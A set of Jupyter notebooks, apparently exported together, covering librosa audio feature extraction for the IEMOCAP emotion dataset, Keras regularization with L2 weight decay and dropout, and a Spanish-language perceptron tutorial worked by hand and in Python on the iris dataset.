print('RMSE mean = {:.5f}'.format(np.mean(rmse)))
print('RMSE std dev = {:.5f}'.format(np.std(rmse)))
from IPython.display import Audio
Audio(y, rate=44100)
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
print(silence/float(len(rmse)))
y_harmonic, y_percussive = librosa.effects.hpss(y)
np.mean(y_harmonic)
autocorr = librosa.core.autocorrelate(y)
np.max(autocorr)
cl = 0.45 * np.mean(abs(y))
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
new_autocorr = librosa.core.autocorrelate(np.array(center_clipped))
np.max(new_autocorr)
columns = ['wav_file', 'label', 'sig_mean', 'sig_std', 'rmse_mean', 'rmse_std', 'silence', 'harmonic', 'auto_corr_max', 'auto_corr_std']
df_features = pd.DataFrame(columns=columns)
```
The following blocks build feature vectors for all the files
```
emotion_dict = {'ang': 0,
'hap': 1,
'exc': 2,
'sad': 3,
'fru': 4,
'fea': 5,
'sur': 6,
'neu': 7,
'xxx': 8,
'oth': 8}
data_dir = r'D:\pre-processed/'
labels_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_'.format(data_dir)
labels_df = pd.read_csv(labels_path)
for sess in (range(1, 6)):
audio_vectors = pickle.load(open('{}{}.pkl'.format(audio_vectors_path, sess), 'rb'))
for index, row in tqdm(labels_df[labels_df['wav_file'].str.contains('Ses0{}'.format(sess))].iterrows()):
try:
wav_file_name = row['wav_file']
# check wave file name
print(wav_file_name)
label = emotion_dict[row['emotion']]
y = audio_vectors[wav_file_name]
feature_list = [wav_file_name, label] # wav_file, label
sig_mean = np.mean(abs(y))
feature_list.append(sig_mean) # sig_mean
feature_list.append(np.std(y)) # sig_std
rmse = librosa.feature.rmse(y + 0.0001)[0]
feature_list.append(np.mean(rmse)) # rmse_mean
feature_list.append(np.std(rmse)) # rmse_std
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
silence /= float(len(rmse))
feature_list.append(silence) # silence
y_harmonic = librosa.effects.hpss(y)[0]
feature_list.append(np.mean(y_harmonic) * 1000) # harmonic (scaled by 1000)
# based on the pitch detection algorithm mentioned here:
# http://access.feld.cvut.cz/view.php?cisloclanku=2009060001
cl = 0.45 * sig_mean
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
auto_corrs = librosa.core.autocorrelate(np.array(center_clipped))
feature_list.append(1000 * np.max(auto_corrs)/len(auto_corrs)) # auto_corr_max (scaled by 1000)
feature_list.append(np.std(auto_corrs)) # auto_corr_std
df_features = df_features.append(pd.DataFrame(feature_list, index=columns).transpose(), ignore_index=True)
except:
print('Some exception occured')
df_features.to_csv(r'D:\pre-processed/audio_features.csv', index=False)
```
|
github_jupyter
|
import os
import pickle
import soundfile as sf
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.style as ms
from tqdm import tqdm
import librosa
import math
import random
import pandas as pd
import IPython.display
import librosa.display
ms.use('seaborn-muted')
%matplotlib inline
data_dir = r'D:\pre-processed/'
labels_df_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_1.pkl'.format(data_dir)
labels_df = pd.read_csv(labels_df_path)
audio_vectors = pickle.load(open(audio_vectors_path, 'rb'))
random_file_name = list(audio_vectors.keys())[random.choice(range(len(audio_vectors.keys())))]
y = audio_vectors[random_file_name]
sr = 44100
plt.figure(figsize=(15,2))
librosa.display.waveplot(y, sr=sr, max_sr=1000, alpha=0.25, color='r')
print('Signal mean = {:.5f}'.format(np.mean(abs(y))))
print('Signal std dev = {:.5f}'.format(np.std(y)))
rmse = librosa.feature.rms(y + 0.0001)[0]
plt.figure(figsize=(15,2))
plt.plot(rmse)
plt.ylabel('RMSE')
print('RMSE mean = {:.5f}'.format(np.mean(rmse)))
print('RMSE std dev = {:.5f}'.format(np.std(rmse)))
from IPython.display import Audio
Audio(y, rate=44100)
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
print(silence/float(len(rmse)))
y_harmonic, y_percussive = librosa.effects.hpss(y)
np.mean(y_harmonic)
autocorr = librosa.core.autocorrelate(y)
np.max(autocorr)
cl = 0.45 * np.mean(abs(y))
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
new_autocorr = librosa.core.autocorrelate(np.array(center_clipped))
np.max(new_autocorr)
columns = ['wav_file', 'label', 'sig_mean', 'sig_std', 'rmse_mean', 'rmse_std', 'silence', 'harmonic', 'auto_corr_max', 'auto_corr_std']
df_features = pd.DataFrame(columns=columns)
emotion_dict = {'ang': 0,
'hap': 1,
'exc': 2,
'sad': 3,
'fru': 4,
'fea': 5,
'sur': 6,
'neu': 7,
'xxx': 8,
'oth': 8}
data_dir = r'D:\pre-processed/'
labels_path = '{}df_iemocap.csv'.format(data_dir)
audio_vectors_path = '{}audio_vectors_'.format(data_dir)
labels_df = pd.read_csv(labels_path)
for sess in (range(1, 6)):
audio_vectors = pickle.load(open('{}{}.pkl'.format(audio_vectors_path, sess), 'rb'))
for index, row in tqdm(labels_df[labels_df['wav_file'].str.contains('Ses0{}'.format(sess))].iterrows()):
try:
wav_file_name = row['wav_file']
# check wave file name
print(wav_file_name)
label = emotion_dict[row['emotion']]
y = audio_vectors[wav_file_name]
feature_list = [wav_file_name, label] # wav_file, label
sig_mean = np.mean(abs(y))
feature_list.append(sig_mean) # sig_mean
feature_list.append(np.std(y)) # sig_std
rmse = librosa.feature.rmse(y + 0.0001)[0]
feature_list.append(np.mean(rmse)) # rmse_mean
feature_list.append(np.std(rmse)) # rmse_std
silence = 0
for e in rmse:
if e <= 0.4 * np.mean(rmse):
silence += 1
silence /= float(len(rmse))
feature_list.append(silence) # silence
y_harmonic = librosa.effects.hpss(y)[0]
feature_list.append(np.mean(y_harmonic) * 1000) # harmonic (scaled by 1000)
# based on the pitch detection algorithm mentioned here:
# http://access.feld.cvut.cz/view.php?cisloclanku=2009060001
cl = 0.45 * sig_mean
center_clipped = []
for s in y:
if s >= cl:
center_clipped.append(s - cl)
elif s <= -cl:
center_clipped.append(s + cl)
elif np.abs(s) < cl:
center_clipped.append(0)
auto_corrs = librosa.core.autocorrelate(np.array(center_clipped))
feature_list.append(1000 * np.max(auto_corrs)/len(auto_corrs)) # auto_corr_max (scaled by 1000)
feature_list.append(np.std(auto_corrs)) # auto_corr_std
df_features = df_features.append(pd.DataFrame(feature_list, index=columns).transpose(), ignore_index=True)
except:
print('Some exception occured')
df_features.to_csv(r'D:\pre-processed/audio_features.csv', index=False)
| 0.173078 | 0.427576 |
# Regularization
On this notebook we will see a problem of overfitting and we will deal wit it adding two kinds of regularization strategies: l2 weight decay on the parameters and dropout.
## The dataset
Dataset is generated with a sklearn function. It consists on some concentric circles with a random noise:
```
# generate two circles dataset
from sklearn.datasets import make_circles
from matplotlib import pyplot as plt
import pandas as pd
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# scatter plot, dots colored by class value
df = pd.DataFrame(dict(x=X[:,0], y=X[:,1], label=y))
colors = {0:'red', 1:'blue'}
fig, ax = plt.subplots()
grouped = df.groupby('label')
for key, group in grouped:
group.plot(ax=ax, kind='scatter', x='x', y='y', label=key, color=colors[key])
plt.show()
```
<font color=red><b>Generate the dataset. Use 100 samples and noise = 0.1. Place a random state. Create a train and test sets. The train must contain only 30% of the samples.
</font>
```
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# split into train and test
n_train = 30
trainX, testX = X[:n_train, :], X[n_train:, :]
trainy, testy = y[:n_train], y[n_train:]
```
## Building the model
We will use a very basic model architecture. In this case it will be:
- Dense 500, relu activated
- Dense quth single unit. sigmoid activated
- use binary crossentropy as the loss function and adam as the optimizer. Add accuracy as the metric.
<font color=red><b>Build the model and train it
</font>
```
import tensorflow as tf
physical_devices = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
tf.keras.backend.clear_session()
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
```
### Overfitting?
Let's see if the model overfits:
```
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
```
<font color=red><b>PLot the losses for both valid and train
</font>
```
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
```
## Weight Decay regularization
We will use the L2 vector norm also called weight decay with a regularization parameter They are based on the next formulas, which are equivalent:
$$\mathcal{J}(W; X, y) + \frac{1}{2}\cdot\lambda\cdot ||W||^2$$
$$\omega_{t+1} = \omega_t -\alpha\cdot\nabla_{\omega}J - \lambda\cdot \omega_t$$
<font color=red><b>Build the same model structure, but add a l2 kernel regularizer on the big dense layer. Use an arbitrary 0.001 value for lambda
</font>
```
from tensorflow.keras.regularizers import l2
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(0.001)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
```
Let's check more than one lambda this time:
<font color=red><b>Build a grid search structure to train models at each lambda value. Include accuracies in a list
</font>
```
# grid search values
values = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6]
all_train, all_test = list(), list()
for param in values:
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(param)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Param: %f, Train: %.3f, Test: %.3f' % (param, train_acc, test_acc))
all_train.append(train_acc)
all_test.append(test_acc)
# plot train and test means
plt.semilogx(values, all_train, label='train', marker='o')
plt.semilogx(values, all_test, label='test', marker='o')
plt.legend()
plt.show()
```
## Dropout
Let's try another source of regularization: Dropout. It consists on randomly removing some neurons from the previous layer at training time
<font color=red><b>Add a dropout of 0.4 to the big dense layer.
</font>
```
from tensorflow.keras.layers import Dropout
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
```
<font color=red><b>PLot the losses for both valid and train
</font>
```
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
```
|
github_jupyter
|
# generate two circles dataset
from sklearn.datasets import make_circles
from matplotlib import pyplot as plt
import pandas as pd
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# scatter plot, dots colored by class value
df = pd.DataFrame(dict(x=X[:,0], y=X[:,1], label=y))
colors = {0:'red', 1:'blue'}
fig, ax = plt.subplots()
grouped = df.groupby('label')
for key, group in grouped:
group.plot(ax=ax, kind='scatter', x='x', y='y', label=key, color=colors[key])
plt.show()
# generate 2d classification dataset
X, y = make_circles(n_samples=100, noise=0.1, random_state=1)
# split into train and test
n_train = 30
trainX, testX = X[:n_train, :], X[n_train:, :]
trainy, testy = y[:n_train], y[n_train:]
import tensorflow as tf
physical_devices = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
tf.keras.backend.clear_session()
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Sequential
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
from tensorflow.keras.regularizers import l2
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(0.001)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
# grid search values
values = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5, 1e-6]
all_train, all_test = list(), list()
for param in values:
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu', kernel_regularizer=l2(param)))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
model.fit(trainX, trainy, epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Param: %f, Train: %.3f, Test: %.3f' % (param, train_acc, test_acc))
all_train.append(train_acc)
all_test.append(test_acc)
# plot train and test means
plt.semilogx(values, all_train, label='train', marker='o')
plt.semilogx(values, all_test, label='test', marker='o')
plt.legend()
plt.show()
from tensorflow.keras.layers import Dropout
# define model
model = Sequential()
model.add(Dense(500, input_dim=2, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
# fit model
history = model.fit(trainX, trainy, validation_data=(testX, testy), epochs=4000, verbose=0)
# evaluate the model
_, train_acc = model.evaluate(trainX, trainy, verbose=0)
_, test_acc = model.evaluate(testX, testy, verbose=0)
print('Train: %.3f, Test: %.3f' % (train_acc, test_acc))
# plot history
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='test')
plt.legend()
plt.show()
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
| 0.919084 | 0.96793 |
<a href="https://colab.research.google.com/github/AxlSyr/ArtificialIntelligenceUAEM/blob/master/TareaPerceptron.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Equipo:
**Reynoso Gomez Luis Alfredo**
**Reyes Flores Axel**
# Breve introducciรณn al Perceptrรณn
---
El Perceptron simple, tambiรฉn conocido una red neuronal de una sola capa (**Single-Layer Neural Network**), es un algoritmo de clasificaciรณn binaria creado por Frank Rosenblatt a partir del modelo neuronal de Warren McCulloch y Walter Pitts desarrollado en 1943.
---
La neurona recibe impulsos externos (consideradas las entradas - inputs) con distinta importancia (o pesos) en una funciรณn de activaciรณn. Si el estรญmulo agregado sobrepasa cierto umbral, la neurona se activa.
Matemรกticamente, definimos x como el vector de estรญmulos y w como el vector de pesos, ambos m dimensiones, y z como la funciรณn de activaciรณn.
$$ w=[w1โฎwm],x=[x1โฎxm]$$
$$z= wT*x $$
$$z = w_1*x_1+โฆ+ w_m*x_m $$
---
El perceptron ฯ(z) se considera activo cuando su valor es mayor o igual al umbral ฮธ o inactivo en cualquier otro caso. Formalmente esta es una [funciรณn escalรณn](https://es.wikipedia.org/wiki/Funci%C3%B3n_escal%C3%B3n_de_Heaviside).
### La regla de aprendizaje
El perceptron tiene una regla de aprendizaje bastante simple que le permite ir ajustando los valores de los pesos (w). Para ello, se siguen los siguientes pasos:
1. Asignar un valor inicial a los pesos de 0 (cero) o valores pequeรฑos al azar.
2. Para cada muestra de entrenamiento x(i) hacer lo siguiente
* Computar el valor de salida y^.
* Actualizar los pesos.
La actualizaciรณn de los pesos se hace incrementando o disminuyรฉndolos en ฮwj
$$w_j=w_j+ฮw_j$$
$$ฮw_j=ฮท(y^iโ\hat{y}^i)x_j^i$$
Donde:
* $ฮท$ es la tasa de aprendizaje que es un valor entre 0 y 1.0
* $y^i$ es el valor real
* $\hat{y}^i$ es el valor de salida calculado (notar el sombrero en la y)
* $x_j^i$ es el valor de la muestra asociado
Esto implica que si el valor real y el valor calculado son el mismo, w no es actualizado o mejor dicho ฮwj=0 . Sin embargo, si hubo un error en la predicciรณn el valor serรก actualizado en la diferencia entre el valor real y el predicho, ajustado por el valor de la muestra y la tasa de aprendizaje.
## Implementando la regla del perceptron en python
Puedes descargar el cuaderno de Jupyter desde el repositorio en Github y asรญ ir siguiendo esta implementaciรณn paso a paso.
Primero partiremos implementando un clase en python. Esta clase define los siguientes mรฉtodos:
* __init__: Define la tasa de aprendizaje del algoritmo y el numero de pasadas a hacer por el set de datos.
* fit: Implementa la regla de aprendizaje, definiendo inicialmente los pesos en 0 y luego ajustรกndolos a medida que calcula/predice el valor para cada fila del dataset.
* predict: Es la funciรณn escalรณn ฯ(z). Si el valor de z es mayor igual a 0,
tiene por valor 1. En cualquier otro caso su valor es -1.
* net_input: Es la implementaciรณn de la funciรณn de activaciรณn z. Si se fijan en el cรณdigo, hace producto punto en los vectores x y w.
```
import numpy as np
class Perceptron:
"""Clasificador Perceptron basado en la descripciรณn del libro
"Python Machine Learning" de Sebastian Raschka.
Parametros
----------
eta: float
Tasa de aprendizaje.
n_iter: int
Pasadas sobre el dataset.
Atributos
---------
w_: array-1d
Pesos actualizados despuรฉs del ajuste
errors_: list
Cantidad de errores de clasificaciรณn en cada pasada
"""
def __init__(self, eta=0.1, n_iter=10):
self.eta = eta
self.n_iter = n_iter
def fit(self, X, y):
"""Ajustar datos de entrenamiento
Parรกmetros
----------
X: array like, forma = [n_samples, n_features]
Vectores de entrenamiento donde n_samples es el nรบmero de muestras y
n_features es el nรบmero de carรกcteristicas de cada muestra.
y: array-like, forma = [n_samples].
Valores de destino
Returns
-------
self: object
"""
self.w_ = np.zeros(1 + X.shape[1])
self.errors_ = []
for _ in range(self.n_iter):
errors = 0
for xi, target in zip(X, y):
update = self.eta * (target - self.predict(xi))
self.w_[1:] += update * xi
self.w_[0] += update
errors += int(update != 0.0)
self.errors_.append(errors)
return self
def predict(self, X):
"""Devolver clase usando funciรณn escalรณn de Heaviside.
phi(z) = 1 si z >= theta; -1 en otro caso
"""
phi = np.where(self.net_input(X) >= 0.0, 1, -1)
return phi
def net_input(self, X):
"""Calcular el valor z (net input)"""
# z = w ยท x + theta
z = np.dot(X, self.w_[1:]) + self.w_[0]
return z
```

## ยฟCรณmo hacer un perceptrรณn?
La estructura bรกsica de un perceptrรณn es la siguiente:
Inputs: Datos con los cuales quieres clasificar.
Weights: Constantes que multiplican a incรณgnitas (inputs) de la ecuaciรณn.
Bias: Constante que permite que se tome una decisiรณn.
Threshold: Punto que representa la divisiรณn de las clasificaciones.
Output: Predicciรณn de la clasificaciรณn.
---
### Explicaciรณn general del proceso
Los inputs son los valores con los que esperas obtener una respuesta (output). Cada input es multiplicado por el correspondiente weight (los cuales inician con valor aleatorio), luego los resultados son sumados junto con una constante (bias). Si este resultado supera el threshold determina un output x, de lo contrario determina un output y.

---
Ahora, no solo se necesita eso, acabamos de ver que los weights iniciaron con valores aleatorios, cรณmo podrรญan valores aleatorios hacer predicciones? Pues se necesita entrenar a la neurona para modificar estos weights y obtener resultados precisos.
### Divisiรณn de los datos para el entrenamiento
Para el entrenamiento se necesitan datos, entre mรกs datos, mejor. Siempre teniendo en cuenta que los datos deben ser significativos para el modelo.
La regla con la que trabajaremos es:
* 90% de los datos son para entrenar
* 10% de los datos son para verificar la precisiรณn
---
La razรณn por la que se elige la proporciรณn de 90:10 es porque los datos para el ejercicio que realizaremos son muy poquitos y necesitamos la mayor cantidad de datos para entrenar el modelo.
Nota Importante: Nunca verifiques la precisiรณn del modelo con los datos con los que lo entrenaste, pues te estarรญas engaรฑando a ti mismo.
## Ejercicios
Proseguiremos ahora con dos ejemplos, uno completamente a mano (el cual lo puedes hacer en una hoja de papel) y otro en Python a โmanoโ (sin librerรญas de machine learning).
### Ejercicio a mano
Haremos que un perceptrรณn entienda lo que es un operador AND de dos variables. En este ejemplo no haremos un set de entrenamiento y un set de verificaciรณn de datos porque son muy pocos datos (sรณlo son 4). Este ejercicio es mรกs para entender quรฉ estรก pasando con los cรกlculos. Es decir, recibirรก dos entradas y nos darรก una salida, como la siguiente tabla:

```
import numpy as np
import pandas as pd
d = {'x': [0,0,1,1], 'y': [0,1,0,1], 'z': [0,0,0,1]}
df = pd.DataFrame(data=d)
df
```
Si graficamos los puntos en un plano, tomando X y Y como coordenadas, quedarรญa algo como lo siguiente:

```
from pylab import *
import matplotlib.pyplot as plt
x = df.x
y = df.y
color=['m','y','r','b']
fig = plt.figure()
ax = fig.add_subplot(111)
scatter(x,y,marker='o', c=color)
[ plot( [dot_x,dot_x] ,[0,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
[ plot( [0,dot_x] ,[dot_y,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
left,right = ax.get_xlim()
low,high = ax.get_ylim()
grid()
show()
```
Lo que buscamos es encontrar una ecuaciรณn que divida los puntos en base a su output, es decir los que tengan el output โ0โ pertenecen a un grupo y los que tengan el output โ1" pertenecen al otro grupo, algo como lo siguiente:

---
Ahora, esta recta puede ser representada por una ecuaciรณn, una ecuaciรณn tiene entradas ($x_i$) y a cada una la multiplicarรก un weight ($w_i$) y al final se le sumarรก una constante ($w_0$), la cual tambiรฉn es un peso. Nuestra ecuaciรณn solo tiene dos entradas ($X$ y $Y$), por lo que la ecuaciรณn queda de la siguiente forma:
$$W_1 * X_1 + W_2*X_2 * W_0*bias$$
---
Esta ecuaciรณn deberรก ser la lรญnea que divida las categorรญas y nos permita clasificar, es decir esta ecuaciรณn nos darรก una predicciรณn cuando se introduzcan las entradas $x_1$ y $x_2$. Iniciaremos nuestros weights de forma aleatoria...
Puedes sacar tus propios valores aleatorios o usar estos para no perderte en el procedimiento, los nรบmeros generados aleatoriamente fueron: 0.03, 0.66 y 0.80.
```
#Ejemplo...
import numpy as np
np.random.random_sample(3).round(4)
```
---
A cada categorรญa se le serรก asociado un nรบmero (clase) que ayudarรก a ajustar los weights, un 1 y un -1, no importa cual escojas, sรณlo estamos determinando una clase a cada uno (y). Yo elegรญ -1 para el 0 y 1 para el 1. De la siguiente forma:

### Reglas de ajuste de weights
Cuando sustituyamos los valores en la ecuaciรณn nos darรก una predicciรณn, si nos da lo que esperamos (**predicciรณn de clase correcta**) no hacemos nada y continuamos con el siguiente conjunto de datos, si nos da algo diferente de lo que esperamos (**predicciรณn de clase incorrecta**), debemos ajustar los weights.
Las decisiones para ajustar los weights son de la siguiente forma:
Si el resultado de la ecuaciรณn es mayor o igual a 0, la predicciรณn de la clase es 1.
Si el resultado de la ecuaciรณn es menor a 0, la predicciรณn de la clase es -1.
---
Las fรณrmulas para ajustar los weights son las siguientes:
$$ W_0 = W_0 + clase * bias $$
$$ W_n = W_n + clase * X_n $$
***Recuerda que la clase puede ser 1 o -1, el cual nos ayuda a entender la predicciรณn del perceptrรณn.**
## Entrenamiento a mano
Empezaremos a introducir los datos en nuestra ecuaciรณn : $w_0 + w_1*x_1 + w_2*x_2$
---
* Primer conjunto de datos
Con $x_1$=0, $x_2$=0, $y$=0, $clase$ = -1
$0.03 + (0.66) * (0) + (0.8) * (0) = 0.03$ -> Predicciรณn de clase: 1
```
x1 = 0
x2 = 0
y = 0
clase = -1
0.03 + (0.66)*x1 + (0.8)*x2
```
La predicciรณn de la clase fue 1 cuando esperamos -1, la predicciรณn fue errรณnea, asรญ que tenemos que ajustar los weights.
Ajuste de weights con las fรณrmulas antes mencionadas:
$w_0 = 0.03 + (-1)*1 = -0.97$
$w_1 = 0.66 + (-1)*(0) = 0.66$
$w_2 = 0.8 + (-1)*(0) = 0.8$
* Segundo conjunto de datos
Con $x_1$=0, $x_2$=1, $y$=0, $clase$ = -1
$- 0.97 + (0.66)*(0) + (0.8)*(1) = โ 0.17$ -> Predicciรณn de -1
```
x1 = 0
x2 = 1
y = 0
clase = -1
-0.97 + (0.66)*x1 + (0.8)*x2
```
* Tercer conjunto de datos
Con $x_1$=1, $x_2$=0, $y$=0, $clase$ = -1
$- 0.97 + (0.66)*(1) + (0.8)*(0) = โ 0.31$ -> Predicciรณn de -1
---
* Cuarto conjunto de datos
Con $x_1$=1, $x_2$=1, $y$=1, $clase$ = 1
$- 0.97 + (0.66)*(1) + (0.8)*(1) = 0.49$ -> Predicciรณn de 1
```
x1 = 1
x2 = 0
y = 0
clase = -1
print(-0.97 + (0.66)*x1 + (0.8)*x2)
x3 = 1
x4 = 1
y = 1
clase = 1
print(-0.97 + (0.66)*x3 + (0.8)*x4)
```
Acabamos con todos los datos, pero uno fue errรณneo, asรญ que iniciaremos con otra รฉpoca (presentaciรณn completa del dataset a aprender), lo que significa que volveremos a usar los datos de nuevo.
Primer conjunto de datos
Con $x_1$=0, $x_2$=0, $y$=0, $clase$ = -1
$- 0.97 + (0.66) * (0) + (0.8) * (0) = โ 0.97 $-> Predicciรณn de -1
---
Podrรญamos continuar pero la รบnica predicciรณn que nos faltaba acaba de ser correcta asรญ que terminamos de ajustar los weights aquรญ.
---
### Pero **ยฟquรฉ representan estos weights?**
Pues son las constantes que multiplican a incรณgnitas (inputs) de la ecuaciรณn, sรณlo recuerda que el $w_0$ multiplica a un 1, es decir, es una constante. Podemos hacer la ecuaciรณn de una recta con estos weights, de la siguiente forma:
$- 0.97 + 0.66x + 0.8y$
En la cual podemos despejar la y para tener una ecuaciรณn mรกs bonita:
$y = (0.97 - 0.66x) / 0.8$
$y = 1.2125 - 0.825 x$
-------

Cuando se obtenga la recta ahora sรณlo necesitamos evaluarla con los puntos y nos dirรก de quรฉ lado de la recta se encuentra, y asรญ es como determinamos a quรฉ clase pertenecen los puntos. Este ejemplo es un poco tramposo porque son muy pocos datos y cuando lo graficamos es totalmente comprensible, pero sirve para entender quรฉ estรก pasando...
```
### Ejercicio con Python
import pandas as pd
import seaborn as sns
iris = sns.load_dataset('iris')
iris
import random
data_with_two_species = iris.iloc[:100,:]
print(len(data_with_two_species))
print(type(data_with_two_species))
data_with_two_species
from sklearn.utils import shuffle
data_with_two_species = shuffle(data_with_two_species)
data_with_two_species
data_training = data_with_two_species.iloc[:90, :]
data_verification = data_with_two_species.iloc[:-10, :]
```
Ahora para hacer todo mรกs claro y entendible harรฉ la clase Perceptrรณn que tenga los siguientes mรฉtodos:
* generate_random_weights
* train
* predict
* adjust_weights
* verify
El constructor de la clase Perceptrรณn recibirรก el nรบmero de weights y un array de las dos clases que se mapean a -1 y 1.
```
class Perceptron:
def __init__(self, number_of_weights, classes):
self.number_of_weights = number_of_weights
self.weights = self.generate_random_weights(number_of_weights)
self.dict_classes = { classes[0]:1, classes[1]:-1 }
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
```
La generaciรณn de weights aleatorios es muy sencilla, sรณlo intenta que abarquen nรบmeros negativos y positivos, yo lo hice con un rango de -5 a 5 (puedes usar el rango que tu prefieras)
```
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
```
